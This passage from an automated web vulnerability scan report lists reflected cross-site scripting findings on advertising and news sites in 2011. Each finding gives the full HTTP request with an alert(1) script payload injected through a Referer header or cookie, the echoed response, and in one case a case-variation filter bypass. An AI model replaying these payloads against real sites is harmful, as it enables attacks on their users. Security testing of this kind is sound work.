Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=LD8Lqa0kru8p5Uo0kpngf9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDAyrlxwspx6jdsnRGwuisv9h94yMkcwripPLER8XUiszfVdcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipQLI4nnnPNiihWA5B16a2n9ccq0ipUPxAAhip91xU4n86mcz6mEmAc8TY0sRHxdTisN9V1yLzG2bqzQfB1c7D7UHWcJ7wkafesisJezZzmURE5lZipFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTBCmcQve7W9mKliiSobRLLWb5OrVGMiprsJQvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGlJZ8zWJiiJArqYAAFGAQj0dI1pxbY6k4tmEPishbY3ELmLzCbjtVl37F6KeOOIHvpt; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 09 May 2011 16:18:28 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 8cf92<script>alert(1)</script>71cdaec5251

2.132. http://search.keywordblocks.com/cmdynet [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search.keywordblocks.com
Path:	/cmdynet

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d072a<script>alert(1)</script>7d435108deb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cmdynet?&requrl=http%3A%2F%2Fwww.americanbankingnews.com%2F2011%2F05%2F09%2Fmorgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight%2F&cid=7CUL160O6&crid=822543251&size=300x250&cpnet=CleSHDHNKNQTLQd9VCB1l613fOdg8mpNSkfNliF4pl0236i3ZlgITiA136hILgIsR&rand=1304957840503 HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d072a<script>alert(1)</script>7d435108deb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=50vr5108253329217967

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Content-Length: 562
Content-Type: text/javascript

_mN._djc = {
failover : 0
};
_mN._util.setCookie('_refterm', 'd072a<script>alert(1)</script>7d435108deb', 1, '/');
document.write("<iframe marginwidth='0' marginheight='0' src='http://search.keywordblocks.com/?dn=americanbankingnews.com&crid=822543251&pid=7PO4005T2&cpnet=2emDt527F6SdQuwVTJ%2BpE%2FxVe35M
...[SNIP]...

2.133. http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.sanfrancisco/be_bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9af'%3balert(1)//56da1b2f443 was submitted in the cli cookie. This input was echoed as 4d9af';alert(1)//56da1b2f443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.q.sanfrancisco/be_bus;sz=300x250;net=q1;ord=1412414579;ord1=456064;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e4d9af'%3balert(1)//56da1b2f443; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:20 GMT
Connection: close
Content-Length: 7259

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-82011931_1304957840","http://ad.doubleclick.net/adj/q1.q.sanfrancisco/be_bus;net=q1;u=,q1-82011931_1304957840,11f8f328940989e4d9af';alert(1)//56da1b2f443,sports,am.h-am.b;;sz=300x250;net=q1;ord1=456064;contx=sports;dc=w;btg=am.h;btg=am.b;ord=1412414579?","300","250",false);</scr'+'ipt>
...[SNIP]...

2.134. http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.sanfrancisco/bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b35c2'%3balert(1)//ad274b2b4bb was submitted in the cli cookie. This input was echoed as b35c2';alert(1)//ad274b2b4bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.sanfrancisco/bus;sz=300x250;net=q1;ord=1304957812.967;ord1=763084;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989eb35c2'%3balert(1)//ad274b2b4bb; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:11 GMT
Connection: close
Content-Length: 7258

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-58571726_1304957831","http://ad.doubleclick.net/adj/q1.sanfrancisco/bus;net=q1;u=,q1-58571726_1304957831,11f8f328940989eb35c2';alert(1)//ad274b2b4bb,sports,am.h-am.b;;sz=300x250;net=q1;ord1=763084;contx=sports;dc=w;btg=am.h;btg=am.b;ord=1304957812.967?","300","250",false);</scr'+'ipt>
...[SNIP]...

2.135. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a3a"-alert(1)-"32e6f86d8e2 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=&$=&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~04231113a3a"-alert(1)-"32e6f86d8e2; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:20 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=91
Expires: Mon, 09 May 2011 16:18:51 GMT
Date: Mon, 09 May 2011 16:17:20 GMT
Connection: close
Content-Length: 16754

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCus
...[SNIP]...
}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~04231113a3a"-alert(1)-"32e6f86d8e2';

var zzhasAd=undefined;

var zzStr = "s=0;u=5ajh4goBADQAAFjiiCYAAABN~04231113a3a"-alert(1)-"32e6f86d8e2;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.136. http://k.collective-media.net/cmadj/cm.quadhearst/ [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.quadhearst/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9b84'%3balert(1)//2f0ff1ee6fd was submitted in the cli cookie. This input was echoed as a9b84';alert(1)//2f0ff1ee6fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.quadhearst/;sz=300x250;net=cm;ord=1304957833;env=ifr;ord1=154691;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ea9b84'%3balert(1)//2f0ff1ee6fd; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:22 GMT
Connection: close
Content-Length: 7692

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
pt language="Javascript">CollectiveMedia.createAndAttachAd("cm-29106152_1304957841","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadhearst&size=300x250&imp_id=cm-29106152_1304957841,11f8f328940989ea9b84';alert(1)//2f0ff1ee6fd&referrer=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2
...[SNIP]...

2.137. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/hearst/300x250/ht_1064833_61548615

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c4fd"><script>alert(1)</script>99c8dcc2d0a was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/hearst/300x250/ht_1064833_61548615?t=1304957839488&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96c4fd"><script>alert(1)</script>99c8dcc2d0a; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2322
Content-Type: text/html
Date: Mon, 09 May 2011 16:17:55 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96c4fd"><script>alert(1)</script>99c8dcc2d0a&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.138. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/hearst/300x250/ht_657020_29767596

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a45"><ScRiPt>alert(1)</ScRiPt>d4af3d52da was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9c2a45"><ScRiPt>alert(1)</ScRiPt>d4af3d52da; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2318
Content-Type: text/html
Date: Mon, 09 May 2011 16:17:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9c2a45"><ScRiPt>alert(1)</ScRiPt>d4af3d52da&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.139. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/hearst/300x250/ht_657020_29767596

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87bb3"><script>alert(1)</script>8640c162696 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb987bb3"><script>alert(1)</script>8640c162696; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2239
Content-Type: text/html
Date: Mon, 09 May 2011 16:17:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb987bb3"><script>alert(1)</script>8640c162696&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb987bb3">
...[SNIP]...

2.140. http://www.marketwatch.com/investing/future/clm11 [rsi_csl cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/future/clm11

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b35b3"><script>alert(1)</script>a009d9e91f8 was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investing/future/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=b35b3"><script>alert(1)</script>a009d9e91f8; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: recentquotes=Future-us-CLM11; expires=Tue, 09-Aug-2011 16:24:50 GMT; path=/
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-MACHINE: sbkdfpswebp01
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 16:24:50 GMT
Content-Length: 82716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
